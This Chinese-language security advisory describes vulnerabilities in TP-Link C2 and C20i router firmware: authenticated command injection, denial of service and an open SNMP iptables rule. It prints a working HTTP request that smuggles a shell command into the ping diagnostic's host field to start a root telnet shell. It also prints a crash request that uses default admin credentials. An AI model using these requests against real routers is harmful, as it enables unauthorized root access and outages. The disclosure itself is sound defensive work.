日前,pierrekim.github.io网站发布了一个安全通告,公布了固件版本为“0.9.1 4.2 v0032.0 Build 160706 Rel.37961n”的TP-Link C2和C20i产品的多个漏洞。漏洞包括命令注入(需要身份认证)、拒绝服务以及不安全的默认配置。
命令注入:一个经过身份认证的攻击者,可以仅仅通过发送一个HTTP请求来进行命令注入,成功利用该漏洞,攻击者可以以root权限执行命令。该漏洞的一个POC如下:
POST /cgi?2 HTTP/1.1 Host: 192.168.1.1 Content-Type: text/plain Referer: http://192.168.1.1/mainFrame.htm Content-Length: 208 Cookie: Authorization=Basic YWRtaW46YWRtaW4= Connection: close [IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6 dataBlockSize=64 timeout=1 numberOfRepetitions=1 host=$(echo 127.0.0.1; /usr/sbin/telnetd -l bin/sh -p 25) X_TP_ConnName=ewan_ipoe_d diagnosticsState=Requested
当攻击者向具有漏洞设备的“Diagnostic”页面发送上述请求时,就可以得到一个远程shell:以root身份启动telnetd程序。
拒绝服务:
一个经过身份认证的攻击者,可以通过向目标发送如下请求来导致设备崩溃:
GET /cgi/ansi HTTP/1.1 Host: 192.168.1.1 Content-Type: text/plain Referer: http://192.168.1.1/mainFrame.htm Content-Length: 208 Cookie: Authorization=Basic YWRtaW46YWRtaW4= Connection: close
不安全的默认配置
另外,这两款产品还存在不安全的IP Tables默认配置。
该默认规则由/lib/libcmm.so产生,并将相关规则写入文件/var/tmp/dconf/rc.router。
其中一条规则如下:
iptables -A INPUT -p udp --dport 161 -j ACCEPT
该规则导致SNMP协议端口在每个网卡接口上都开放。
然而幸运的是,虽然SNMP的相关配置可以通过/main/snmp.html页面进行修改,但是snmpd程序已经从固件镜像中删除了。
相关链接如下:https://pierrekim.github.io/advisories/2017-tplink-0x00.txt
受影响的版本
使用“0.9.1 4.2 v0032.0 Build 160706 Rel.37961n”版本固件的TP-Link C2和C20i。
规避方案
TP-Link厂商表示将会在今年发布补丁,以修补上述漏洞。作为临时的缓解策略,用户可以禁用WAN口的管理功能。
声 明
本安全公告仅用来描述可能存在的安全问题,绿盟科技不为此安全公告提供任何保证或承诺。由于传播、利用此安全公告所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,绿盟科技以及安全公告作者不为此承担任何责任。绿盟科技拥有对此安全公告的修改和解释权。如欲转载或传播此安全公告,必须保证此安全公告的完整性,包括版权声明等全部内容。未经绿盟科技允许,不得任意修改或者增减此安全公告内容,不得以任何方式将其用于商业目的。
关于绿盟科技
北京神州绿盟信息安全科技股份有限公司(简称绿盟科技)成立于2000年4月,总部位于北京。在国内外设有30多个分支机构,为政府、运营商、金融、能源、互联网以及教育、医疗等行业用户,提供具有核心竞争力的安全产品及解决方案,帮助客户实现业务的安全顺畅运行。
基于多年的安全攻防研究,绿盟科技在网络及终端安全、互联网基础安全、合规及安全管理等领域,为客户提供入侵检测/防护、抗拒绝服务攻击、远程安全评估以及Web安全防护等产品以及专业安全服务。
北京神州绿盟信息安全科技股份有限公司于2014年1月29日起在深圳证券交易所创业板上市交易,股票简称:绿盟科技,股票代码:300369。
如果您需要了解更多内容,可以
加入QQ群:570982169
直接询问:010-68438880